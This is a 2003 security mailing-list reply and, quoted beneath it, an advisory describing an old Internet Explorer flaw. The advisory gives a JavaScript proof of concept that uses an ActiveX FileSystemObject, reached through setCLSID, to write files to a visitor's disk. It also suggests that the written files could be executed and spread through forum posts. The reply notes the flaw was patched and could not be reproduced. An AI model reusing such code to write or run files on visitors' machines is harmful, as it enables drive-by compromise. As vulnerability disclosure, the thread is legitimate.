RE: Internet Explorer JavaScript insecure function

["Scovetta, Michael V" <Michael.Scovetta () ca com>]

This is an old exploit, google "setCLSID" and you'll see a bunch of docs
referencing this exploit. From what I gather, it's the result of some
combination of a buggy WshShell, jscript.dll, and bad Internet-Zone 
security values. I believe Microsoft fixed this more than two years ago,
as per: 
   http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
(and probably others). If you're still using IE 5.x, you should just
upgrade. I'm sure that there are many users still using 5.x browsers, but
if you have it totally patched, this should not be exploitable.

And WriteLine is an function of the ActiveX FileSystemObject, which has
nothing to do with JavaScript-- JS only provides the ability to call
ActiveX functions.

I was unable to get this exploit to work, regardless of my security settings,
using 6.0.2800.1106.

Michael Scovetta

-----Original Message-----
From: FREEBRAIN [mailto:freebrain () unionnewbies net]
Sent: Sunday, December 07, 2003 9:57 AM
To: vuln-dev () securityfocus com
Subject: Internet Explorer JavaScript insecure function



* Internet Explorer JavaScript insecure function * 


Product: Microsoft Internet Explorer
Version: 5.x (probabily other versions may be affected) 


*** 


Problem: 

I discovered a javascript function (interpreted by Internet Explorer) called 
"file.writeline()" may be
potentially dangerous for Internet Explorer users. This function allows to 
write files  by means of
JavaScript on a hard disk. 

An attacker may use this function writting JavaScript code in posts of 
forums, guestbooks, etc  for owning
his victim's computers. With "file.writeline()" function the attacker can 
write trojans/virus/etc on his
victim's hard disks, for example, an attacker may use JavaScript 
"file.writeline()" function for writting
a malicious file in VBS (Visual Basic Scripting) language. 

I repeat, this may be potentially dangerous for Internet Explorer users. 

NOTE: Actually a virus in the wild that affects to mIRC users is using this 
function ("file.writeline"). 

NOTE2: As you can see on the "Proof of concept", other functions are needed 
to carry out an "intrusion". 


*** 


Proof of concept: 

InterfaceObject=document.applets[0];
setTimeout("Write()",1000);
function Write() {
fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
InterfaceObject.setCLSID(fsoClassID);
fso = InterfaceObject.createInstance();
// windir = fso.getspecialfolder ;
filename = "\\proof.txt";
var filecontent = "Hello world";
file = fso.opentextfile(filename, "2", "TRUE");
file.writeline(filecontent)
file.close(); 

} 

This code writes a file called "proof.txt" in the hard disk, with the 
content "Hello world". Also you can
execute files you write by means of JavaScript adding "Run();" to the 
function. 


*** 


Solution: 

I'm not sure about the solution but I recommend to upgrade to the last 
version of Internet Explorer.
Also I recommend webmasters to forbid HTML codes that content this function 
in their forums, guestbooks, etc. 


*** 


Thanks to: 

#disidents,#hackers,#hacker @ irc-phoenix.org 

#disidents,#sleepx,#ayuda_internet @ irc-hispano.org 

Special thanks go to: Impos, |_Tr0mP4s 

(sorry my poor english) 


*** 


By FREEBRAIN 

FREEBRAIN is a member of DisidentS Hacker Team 

http://disidents-team.cjb.net (under construction) - 
http://www.gratisweb.com/disidents 

<freebrain () unionnewbies net> ( www.unionnewbies.net )